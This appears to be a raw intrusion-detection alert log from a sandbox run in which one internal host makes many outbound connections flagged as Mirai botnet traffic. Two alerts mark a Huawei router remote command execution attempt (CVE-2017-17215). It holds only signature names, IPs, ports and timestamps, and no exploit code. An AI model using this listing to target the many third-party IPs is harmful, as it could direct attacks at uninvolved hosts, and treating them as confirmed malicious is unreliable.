                                                            192.168.2.23112.80.252.25344570802839471 02/14/24-09:29:20.925726TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4457080192.168.2.23112.80.252.253
                                                            192.168.2.2395.154.252.12659664802839471 02/14/24-09:28:13.866267TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5966480192.168.2.2395.154.252.126
                                                            192.168.2.2395.58.255.23059450802839471 02/14/24-09:29:47.700385TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5945080192.168.2.2395.58.255.230
                                                            192.168.2.2388.130.182.12835164802839471 02/14/24-09:28:53.421997TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3516480192.168.2.2388.130.182.128
                                                            192.168.2.23112.51.126.12033588802839471 02/14/24-09:27:59.104332TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3358880192.168.2.23112.51.126.120
                                                            192.168.2.2395.110.197.20738746802839471 02/14/24-09:30:21.793447TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3874680192.168.2.2395.110.197.207
                                                            192.168.2.23112.124.185.18338972802839471 02/14/24-09:27:44.347060TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3897280192.168.2.23112.124.185.183
                                                            192.168.2.2395.217.6.23844880802839471 02/14/24-09:28:10.731022TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4488080192.168.2.2395.217.6.238
                                                            192.168.2.23112.140.38.7539726802839471 02/14/24-09:30:04.882118TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3972680192.168.2.23112.140.38.75
                                                            192.168.2.23112.47.11.4154508802839471 02/14/24-09:29:20.940885TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5450880192.168.2.23112.47.11.41
                                                            192.168.2.23112.48.244.5439996802839471 02/14/24-09:29:01.251221TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3999680192.168.2.23112.48.244.54
                                                            192.168.2.2395.217.66.241626802839471 02/14/24-09:29:58.688282TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4162680192.168.2.2395.217.66.2
                                                            192.168.2.23112.184.44.9748426802839471 02/14/24-09:30:00.275215TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4842680192.168.2.23112.184.44.97
                                                            192.168.2.2395.111.240.24942560802839471 02/14/24-09:28:04.032282TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4256080192.168.2.2395.111.240.249
                                                            192.168.2.2388.99.239.1844720802839471 02/14/24-09:28:16.951107TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4472080192.168.2.2388.99.239.18
                                                            192.168.2.2395.100.58.7341654802839471 02/14/24-09:27:59.276834TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4165480192.168.2.2395.100.58.73
                                                            192.168.2.2395.218.216.21641042802839471 02/14/24-09:29:51.879385TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4104280192.168.2.2395.218.216.216
                                                            192.168.2.2395.217.229.22655252802839471 02/14/24-09:28:23.339229TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5525280192.168.2.2395.217.229.226
                                                            192.168.2.2388.214.19.7555598802839471 02/14/24-09:28:25.849010TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5559880192.168.2.2388.214.19.75
                                                            192.168.2.23112.186.102.15345696802839471 02/14/24-09:29:55.379215TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4569680192.168.2.23112.186.102.153
                                                            192.168.2.2395.215.240.13636028802839471 02/14/24-09:29:04.265978TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3602880192.168.2.2395.215.240.136
                                                            192.168.2.23112.213.32.14850220802839471 02/14/24-09:28:57.839426TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5022080192.168.2.23112.213.32.148
                                                            192.168.2.2388.153.80.13038604802839471 02/14/24-09:28:37.589491TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3860480192.168.2.2388.153.80.130
                                                            192.168.2.2395.100.228.19039598802839471 02/14/24-09:29:32.743923TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3959880192.168.2.2395.100.228.190
                                                            192.168.2.2388.218.224.11034674802839471 02/14/24-09:28:42.006547TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3467480192.168.2.2388.218.224.110
                                                            192.168.2.2395.216.104.5241186802839471 02/14/24-09:29:29.877845TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4118680192.168.2.2395.216.104.52
                                                            192.168.2.2395.132.214.9547258802839471 02/14/24-09:28:23.357066TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4725880192.168.2.2395.132.214.95
                                                            192.168.2.23197.246.141.1752504372152835222 02/14/24-09:29:33.287791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250437215192.168.2.23197.246.141.17
                                                            192.168.2.2395.101.243.20046154802839471 02/14/24-09:28:37.991051TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4615480192.168.2.2395.101.243.200
                                                            192.168.2.2395.171.107.17459238802839471 02/14/24-09:29:15.514216TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5923880192.168.2.2395.171.107.174
                                                            192.168.2.2395.163.56.16933970802839471 02/14/24-09:29:46.127571TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3397080192.168.2.2395.163.56.169
                                                            192.168.2.2395.216.92.7547084802839471 02/14/24-09:28:32.605835TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4708480192.168.2.2395.216.92.75
                                                            192.168.2.2395.107.144.23546716802839471 02/14/24-09:29:08.828010TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4671680192.168.2.2395.107.144.235
                                                            192.168.2.2395.126.76.3251778802839471 02/14/24-09:29:58.979071TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5177880192.168.2.2395.126.76.32
                                                            192.168.2.23112.74.44.16641044802839471 02/14/24-09:29:36.083467TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4104480192.168.2.23112.74.44.166
                                                            192.168.2.2388.209.228.21534142802839471 02/14/24-09:28:53.188656TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3414280192.168.2.2388.209.228.215
                                                            192.168.2.2395.217.178.21039922802839471 02/14/24-09:29:53.106752TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3992280192.168.2.2395.217.178.210
                                                            192.168.2.2388.198.7.1656718802839471 02/14/24-09:28:25.812419TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5671880192.168.2.2388.198.7.16
                                                            192.168.2.23112.12.91.12451820802839471 02/14/24-09:30:13.714899TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5182080192.168.2.23112.12.91.124
                                                            192.168.2.2388.221.37.5344592802839471 02/14/24-09:29:40.979447TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4459280192.168.2.2388.221.37.53
                                                            192.168.2.23112.173.228.22646472802839471 02/14/24-09:28:11.083217TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4647280192.168.2.23112.173.228.226
                                                            192.168.2.2395.57.5.10737456802839471 02/14/24-09:28:38.255169TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3745680192.168.2.2395.57.5.107
                                                            192.168.2.2395.100.76.23547608802839471 02/14/24-09:28:41.232002TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4760880192.168.2.2395.100.76.235
                                                            192.168.2.2395.57.202.9333860802839471 02/14/24-09:30:19.055564TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3386080192.168.2.2395.57.202.93
                                                            192.168.2.2395.72.216.738270802839471 02/14/24-09:28:32.922928TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3827080192.168.2.2395.72.216.7
                                                            192.168.2.2395.216.234.9454082802839471 02/14/24-09:29:51.818652TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5408280192.168.2.2395.216.234.94
                                                            192.168.2.2388.15.81.17952268802839471 02/14/24-09:28:53.395085TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5226880192.168.2.2388.15.81.179
                                                            192.168.2.2395.57.131.2860980802839471 02/14/24-09:29:12.964638TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6098080192.168.2.2395.57.131.28
                                                            192.168.2.2395.158.56.22043926802839471 02/14/24-09:27:55.237395TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4392680192.168.2.2395.158.56.220
                                                            192.168.2.2395.0.213.6951232802839471 02/14/24-09:29:58.713858TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5123280192.168.2.2395.0.213.69
                                                            192.168.2.2395.154.17.16637460802839471 02/14/24-09:30:21.782373TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3746080192.168.2.2395.154.17.166
                                                            192.168.2.2395.100.246.15735116802839471 02/14/24-09:29:08.981352TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3511680192.168.2.2395.100.246.157
                                                            192.168.2.2395.101.57.21433680802839471 02/14/24-09:30:11.442813TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3368080192.168.2.2395.101.57.214
                                                            192.168.2.2395.101.225.8960752802839471 02/14/24-09:30:25.502908TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6075280192.168.2.2395.101.225.89
                                                            192.168.2.2395.101.83.8660776802839471 02/14/24-09:28:47.356183TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6077680192.168.2.2395.101.83.86
                                                            192.168.2.2388.221.151.1354978802839471 02/14/24-09:30:18.586705TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5497880192.168.2.2388.221.151.13
                                                            192.168.2.2395.100.55.13145728802839471 02/14/24-09:29:23.932933TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4572880192.168.2.2395.100.55.131
                                                            192.168.2.23112.147.179.18256268802839471 02/14/24-09:27:52.686623TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5626880192.168.2.23112.147.179.182
                                                            192.168.2.2395.86.73.18850170802839471 02/14/24-09:29:08.636256TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5017080192.168.2.2395.86.73.188
                                                            192.168.2.2395.0.133.23632850802839471 02/14/24-09:29:46.676509TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3285080192.168.2.2395.0.133.236
                                                            192.168.2.23112.46.49.15942878802839471 02/14/24-09:28:23.192539TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4287880192.168.2.23112.46.49.159
                                                            192.168.2.23112.173.228.22649092802839471 02/14/24-09:29:36.022452TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4909280192.168.2.23112.173.228.226
                                                            192.168.2.23112.17.48.4934424802839471 02/14/24-09:29:52.463933TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3442480192.168.2.23112.17.48.49
                                                            192.168.2.2388.102.200.12055310802839471 02/14/24-09:27:53.192870TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5531080192.168.2.2388.102.200.120
                                                            192.168.2.2395.217.49.24441738802839471 02/14/24-09:29:08.605035TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4173880192.168.2.2395.217.49.244
                                                            192.168.2.2395.217.232.9143862802839471 02/14/24-09:29:40.519028TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4386280192.168.2.2395.217.232.91
                                                            192.168.2.2395.58.240.21648294802839471 02/14/24-09:30:22.075385TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4829480192.168.2.2395.58.240.216
                                                            192.168.2.2395.100.218.4355204802839471 02/14/24-09:29:58.799556TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5520480192.168.2.2395.100.218.43
                                                            192.168.2.2395.237.86.25157848802839471 02/14/24-09:27:59.280267TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5784880192.168.2.2395.237.86.251
                                                            192.168.2.23112.29.198.8834418802839471 02/14/24-09:28:22.769187TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3441880192.168.2.23112.29.198.88
                                                            192.168.2.2395.217.180.12937936802839471 02/14/24-09:28:10.741113TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3793680192.168.2.2395.217.180.129
                                                            192.168.2.2395.38.75.7843920802839471 02/14/24-09:28:54.999431TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4392080192.168.2.2395.38.75.78
                                                            192.168.2.2395.217.18.18137846802839471 02/14/24-09:30:14.266776TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3784680192.168.2.2395.217.18.181
                                                            192.168.2.2395.216.221.14047022802839471 02/14/24-09:29:24.172251TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4702280192.168.2.2395.216.221.140
                                                            192.168.2.2388.221.159.8235926802839471 02/14/24-09:28:16.906122TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3592680192.168.2.2388.221.159.82
                                                            192.168.2.2388.130.135.5042658802839471 02/14/24-09:30:02.346978TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4265880192.168.2.2388.130.135.50
                                                            192.168.2.2395.100.233.3245874802839471 02/14/24-09:29:04.221536TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4587480192.168.2.2395.100.233.32
                                                            192.168.2.2388.208.229.1240802802839471 02/14/24-09:29:38.017969TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4080280192.168.2.2388.208.229.12
                                                            192.168.2.2395.217.12.17756626802839471 02/14/24-09:30:25.522677TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5662680192.168.2.2395.217.12.177
                                                            192.168.2.23112.175.51.20950512802839471 02/14/24-09:30:15.804293TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5051280192.168.2.23112.175.51.209
                                                            192.168.2.2388.103.182.13754716802839471 02/14/24-09:29:40.994705TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5471680192.168.2.2388.103.182.137
                                                            192.168.2.23112.171.223.23059330802839471 02/14/24-09:29:25.139242TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5933080192.168.2.23112.171.223.230
                                                            192.168.2.2395.100.0.12046302802839471 02/14/24-09:30:11.857420TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4630280192.168.2.2395.100.0.120
                                                            192.168.2.2395.163.55.17936154802839471 02/14/24-09:28:19.758488TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3615480192.168.2.2395.163.55.179
                                                            192.168.2.2395.131.137.24249188802839471 02/14/24-09:30:21.766585TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4918880192.168.2.2395.131.137.242
                                                            192.168.2.2395.6.13.18148104802839471 02/14/24-09:28:55.247483TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4810480192.168.2.2395.6.13.181
                                                            192.168.2.23112.124.65.22534494802839471 02/14/24-09:29:23.725555TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3449480192.168.2.23112.124.65.225
                                                            192.168.2.2395.100.13.19952166802839471 02/14/24-09:29:18.893995TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5216680192.168.2.2395.100.13.199
                                                            192.168.2.2388.248.141.22836872802839471 02/14/24-09:28:50.294003TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3687280192.168.2.2388.248.141.228
                                                            192.168.2.2395.196.221.9945568802839471 02/14/24-09:30:22.604094TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4556880192.168.2.2395.196.221.99
                                                            192.168.2.23112.167.5.22039756802839471 02/14/24-09:28:51.305191TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3975680192.168.2.23112.167.5.220
                                                            192.168.2.2395.9.91.656168802839471 02/14/24-09:29:40.540498TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5616880192.168.2.2395.9.91.6
                                                            192.168.2.2395.175.8.12653476802839471 02/14/24-09:28:00.921125TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5347680192.168.2.2395.175.8.126
                                                            192.168.2.2388.198.171.23437068802839471 02/14/24-09:29:50.000616TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3706880192.168.2.2388.198.171.234
                                                            192.168.2.23112.105.29.8942918802839471 02/14/24-09:29:36.072494TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4291880192.168.2.23112.105.29.89
                                                            192.168.2.2395.182.121.11939806802839471 02/14/24-09:29:51.845517TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3980680192.168.2.2395.182.121.119
                                                            192.168.2.2395.179.192.21256548802839471 02/14/24-09:29:52.924429TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5654880192.168.2.2395.179.192.212
                                                            192.168.2.2395.182.78.1160824802839471 02/14/24-09:28:38.112035TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6082480192.168.2.2395.182.78.11
                                                            192.168.2.2395.68.115.4450294802839471 02/14/24-09:28:23.348383TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5029480192.168.2.2395.68.115.44
                                                            192.168.2.2388.114.193.10850692802839471 02/14/24-09:28:30.006330TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5069280192.168.2.2388.114.193.108
                                                            192.168.2.23112.125.25.23354870802839471 02/14/24-09:29:36.445227TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5487080192.168.2.23112.125.25.233
                                                            192.168.2.2395.131.147.15146324802839471 02/14/24-09:29:56.169873TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4632480192.168.2.2395.131.147.151
                                                            192.168.2.2388.198.134.9741860802839471 02/14/24-09:30:07.651396TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4186080192.168.2.2388.198.134.97
                                                            192.168.2.2395.140.139.14345656802839471 02/14/24-09:30:25.525596TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4565680192.168.2.2395.140.139.143
                                                            192.168.2.2395.216.159.21639806802839471 02/14/24-09:29:18.307813TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3980680192.168.2.2395.216.159.216
                                                            192.168.2.2395.100.150.13038970802839471 02/14/24-09:28:16.745395TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3897080192.168.2.2395.100.150.130
                                                            192.168.2.2395.217.19.1949132802839471 02/14/24-09:29:23.945969TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4913280192.168.2.2395.217.19.19
                                                            192.168.2.2388.99.95.12042534802839471 02/14/24-09:30:02.157655TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4253480192.168.2.2388.99.95.120
                                                            192.168.2.2395.59.170.22135710802839471 02/14/24-09:28:10.802265TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3571080192.168.2.2395.59.170.221
                                                            192.168.2.2395.100.13.10437370802839471 02/14/24-09:29:24.480141TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3737080192.168.2.2395.100.13.104
                                                            192.168.2.23112.196.24.5751524802839471 02/14/24-09:28:19.518570TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5152480192.168.2.23112.196.24.57
                                                            192.168.2.23112.170.27.14346860802839471 02/14/24-09:29:52.189921TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4686080192.168.2.23112.170.27.143
                                                            192.168.2.2395.210.89.354138802839471 02/14/24-09:28:04.031409TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5413880192.168.2.2395.210.89.3
                                                            192.168.2.2388.88.70.20933166802839471 02/14/24-09:29:30.106623TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3316680192.168.2.2388.88.70.209
                                                            192.168.2.2388.34.159.7440246802839471 02/14/24-09:30:21.995209TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4024680192.168.2.2388.34.159.74
                                                            192.168.2.23112.167.247.452692802839471 02/14/24-09:27:52.974805TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5269280192.168.2.23112.167.247.4
                                                            192.168.2.2388.119.160.8339586802839471 02/14/24-09:27:54.896013TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3958680192.168.2.2388.119.160.83
                                                            192.168.2.2395.216.175.4258486802839471 02/14/24-09:29:58.688311TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5848680192.168.2.2395.216.175.42
                                                            192.168.2.2388.99.147.550424802839471 02/14/24-09:30:16.008364TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5042480192.168.2.2388.99.147.5
                                                            192.168.2.2388.221.248.7049600802839471 02/14/24-09:30:02.507864TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4960080192.168.2.2388.221.248.70
                                                            192.168.2.2388.233.139.24247144802839471 02/14/24-09:29:15.813181TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4714480192.168.2.2388.233.139.242
                                                            192.168.2.2395.90.14.2249480802839471 02/14/24-09:27:45.916355TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4948080192.168.2.2395.90.14.22
                                                            192.168.2.2395.100.176.9154906802839471 02/14/24-09:29:53.080553TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5490680192.168.2.2395.100.176.91
                                                            192.168.2.2395.97.176.1440376802839471 02/14/24-09:30:23.049688TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4037680192.168.2.2395.97.176.14
                                                            192.168.2.2388.149.250.16842536802839471 02/14/24-09:30:25.748570TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4253680192.168.2.2388.149.250.168
                                                            192.168.2.23112.13.125.2658592802839471 02/14/24-09:28:47.277311TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5859280192.168.2.23112.13.125.26
                                                            192.168.2.2395.181.239.1059696802839471 02/14/24-09:29:24.050304TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5969680192.168.2.2395.181.239.10
                                                            192.168.2.2388.81.149.18353088802839471 02/14/24-09:30:21.575552TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5308880192.168.2.2388.81.149.183
                                                            192.168.2.2388.221.70.22851982802839471 02/14/24-09:28:14.073183TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5198280192.168.2.2388.221.70.228
                                                            192.168.2.2388.198.154.13537728802839471 02/14/24-09:28:14.085903TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3772880192.168.2.2388.198.154.135
                                                            192.168.2.23112.165.90.23554018802839471 02/14/24-09:28:13.671604TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5401880192.168.2.23112.165.90.235
                                                            192.168.2.2388.99.249.25445222802839471 02/14/24-09:28:14.083074TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4522280192.168.2.2388.99.249.254
                                                            192.168.2.2388.99.175.1855218802839471 02/14/24-09:30:25.937931TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5521880192.168.2.2388.99.175.18
                                                            192.168.2.2395.143.177.13450924802839471 02/14/24-09:29:23.953654TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5092480192.168.2.2395.143.177.134
                                                            192.168.2.23112.185.241.21960406802839471 02/14/24-09:29:14.168984TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6040680192.168.2.23112.185.241.219
                                                            192.168.2.2388.198.127.24535028802839471 02/14/24-09:29:30.063338TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3502880192.168.2.2388.198.127.245
                                                            192.168.2.2395.100.211.2742024802839471 02/14/24-09:29:04.240277TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4202480192.168.2.2395.100.211.27
                                                            192.168.2.2395.235.214.17158686802839471 02/14/24-09:28:07.082880TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5868680192.168.2.2395.235.214.171
                                                            192.168.2.2395.173.164.5152832802839471 02/14/24-09:29:32.984840TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5283280192.168.2.2395.173.164.51
                                                            192.168.2.2395.164.254.5450488802839471 02/14/24-09:28:16.654188TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5048880192.168.2.2395.164.254.54
                                                            192.168.2.2388.73.152.25545798802839471 02/14/24-09:30:16.024813TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4579880192.168.2.2388.73.152.255
                                                            192.168.2.23112.153.134.3657688802839471 02/14/24-09:28:51.330483TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5768880192.168.2.23112.153.134.36
                                                            192.168.2.2388.198.229.24654178802839471 02/14/24-09:29:06.102823TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5417880192.168.2.2388.198.229.246
                                                            192.168.2.23112.74.96.2657744802839471 02/14/24-09:30:03.240302TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5774480192.168.2.23112.74.96.26
                                                            192.168.2.2395.101.114.12453140802839471 02/14/24-09:28:29.517745TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5314080192.168.2.2395.101.114.124
                                                            192.168.2.2395.100.190.6146932802839471 02/14/24-09:28:04.045650TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4693280192.168.2.2395.100.190.61
                                                            192.168.2.2395.31.224.746052802839471 02/14/24-09:30:13.096088TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4605280192.168.2.2395.31.224.7
                                                            192.168.2.2395.173.180.7445446802839471 02/14/24-09:28:20.134315TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4544680192.168.2.2395.173.180.74
                                                            192.168.2.2388.221.149.15247578802839471 02/14/24-09:30:01.937375TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4757880192.168.2.2388.221.149.152
                                                            192.168.2.2395.101.7.18055254802839471 02/14/24-09:30:11.438613TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5525480192.168.2.2395.101.7.180
                                                            192.168.2.2395.228.168.23445346802839471 02/14/24-09:29:51.813756TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4534680192.168.2.2395.228.168.234
                                                            192.168.2.23112.219.58.3544112802839471 02/14/24-09:28:33.194577TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4411280192.168.2.23112.219.58.35
                                                            192.168.2.2395.97.189.18246600802839471 02/14/24-09:29:12.905470TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4660080192.168.2.2395.97.189.182
                                                            192.168.2.2395.86.103.9449804802839471 02/14/24-09:29:40.535639TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4980480192.168.2.2395.86.103.94
                                                            192.168.2.2388.99.104.1739262802839471 02/14/24-09:30:01.952764TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3926280192.168.2.2388.99.104.17
                                                            192.168.2.2395.101.71.20558636802839471 02/14/24-09:27:45.906429TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5863680192.168.2.2395.101.71.205
                                                            192.168.2.2395.100.72.9540512802839471 02/14/24-09:28:32.895212TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4051280192.168.2.2395.100.72.95
                                                            192.168.2.2395.168.203.16337178802839471 02/14/24-09:29:08.815869TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3717880192.168.2.2395.168.203.163
                                                            192.168.2.2395.67.88.453448802839471 02/14/24-09:29:51.830248TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5344880192.168.2.2395.67.88.4
                                                            192.168.2.2395.101.11.7649650802839471 02/14/24-09:27:59.286174TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4965080192.168.2.2395.101.11.76
                                                            192.168.2.2395.70.156.5058912802839471 02/14/24-09:27:57.721226TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5891280192.168.2.2395.70.156.50
                                                            192.168.2.23197.246.141.1752504372152829579 02/14/24-09:29:33.287791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250437215192.168.2.23197.246.141.17
                                                            192.168.2.23112.185.223.11950640802839471 02/14/24-09:28:11.268359TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5064080192.168.2.23112.185.223.119
                                                            192.168.2.2395.57.110.8954212802839471 02/14/24-09:28:39.850386TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5421280192.168.2.2395.57.110.89
                                                            192.168.2.2395.188.70.3854100802839471 02/14/24-09:28:32.692836TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5410080192.168.2.2395.188.70.38
                                                            192.168.2.2395.217.236.8635114802839471 02/14/24-09:29:12.895189TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3511480192.168.2.2395.217.236.86
